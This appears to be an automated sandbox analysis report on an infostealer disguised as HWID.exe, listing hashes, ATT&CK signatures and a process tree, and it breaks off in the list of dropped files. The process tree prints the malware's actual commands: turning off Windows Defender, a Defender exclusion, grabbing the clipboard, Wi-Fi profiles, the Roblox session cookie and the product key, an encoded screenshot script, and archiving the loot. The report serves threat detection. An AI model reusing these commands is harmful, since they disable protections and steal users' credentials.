Analysis

  • max time kernel
    427s
  • max time network
    429s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-12-2024 19:54

General

  • Target

    HWID.exe

  • Size

    7.6MB

  • MD5

    4b6b77ed0373e7c972bcfb4a0e131b36

  • SHA1

    136ebbe6ec0f7307a18a3c4852c8f249d0f93e16

  • SHA256

    394a14c637fdd6948b623fd0ab72ff4f1fb9532c25150974d23181455914b817

  • SHA512

    eb78aee730af22254ea98eb3d3076a06f7d76fae97bdde76a809c55d8defd6cee7d515164eacc499a0a27976d335a5a1923e1ff18f4ec4a0bf23e0287b90d793

  • SSDEEP

    196608:C3D+kdpwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWd:W5EIHL7HmBYXrYoaUNa

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HWID.exe
    "C:\Users\Admin\AppData\Local\Temp\HWID.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Users\Admin\AppData\Local\Temp\HWID.exe
      "C:\Users\Admin\AppData\Local\Temp\HWID.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HWID.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HWID.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3428
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3584
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2196
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:72
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3080
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4356
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4792
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:2324
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4284
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2592
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2868
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pecsiw4c\pecsiw4c.cmdline"
              5⤵
                PID:2244
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEEB.tmp" "c:\Users\Admin\AppData\Local\Temp\pecsiw4c\CSCADC42161891D4D6CABE0AB221701C1.TMP"
                  6⤵
                    PID:4336
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2836
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:1356
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1160
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4816
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3424
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1516
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3904
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2440
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2240
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:1820
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:1092
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1572
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:2184
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2660
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "getmac"
                              3⤵
                                PID:2356
                                • C:\Windows\system32\getmac.exe
                                  getmac
                                  4⤵
                                    PID:3484
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21122\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\Zrabu.zip" *"
                                  3⤵
                                    PID:2544
                                    • C:\Users\Admin\AppData\Local\Temp\_MEI21122\rar.exe
                                      C:\Users\Admin\AppData\Local\Temp\_MEI21122\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\Zrabu.zip" *
                                      4⤵
                                      • Executes dropped EXE
                                      PID:1840
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:4048
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2244
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:1492
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:2380
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:3772
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:1972
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:3692
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2060
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:3004
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:3452
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:3440
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4644
                                              • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                1⤵
                                                • Modifies registry class
                                                • Suspicious use of SetWindowsHookEx
                                                PID:1168

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                3KB

                                                MD5

                                                74e4a39ae145a98de20041613220dfed

                                                SHA1

                                                ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                SHA256

                                                2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                SHA512

                                                96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                45f53352160cf0903c729c35c8edfdce

                                                SHA1

                                                b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

                                                SHA256

                                                9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2

                                                SHA512

                                                e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                2e8eb51096d6f6781456fef7df731d97

                                                SHA1

                                                ec2aaf851a618fb43c3d040a13a71997c25bda43

                                                SHA256

                                                96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                                                SHA512

                                                0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                430e6c691957ab3b0275d63f96131ce4

                                                SHA1

                                                b4fc42632e1a214b95c330bfc1ffdacad9c104b7

                                                SHA256

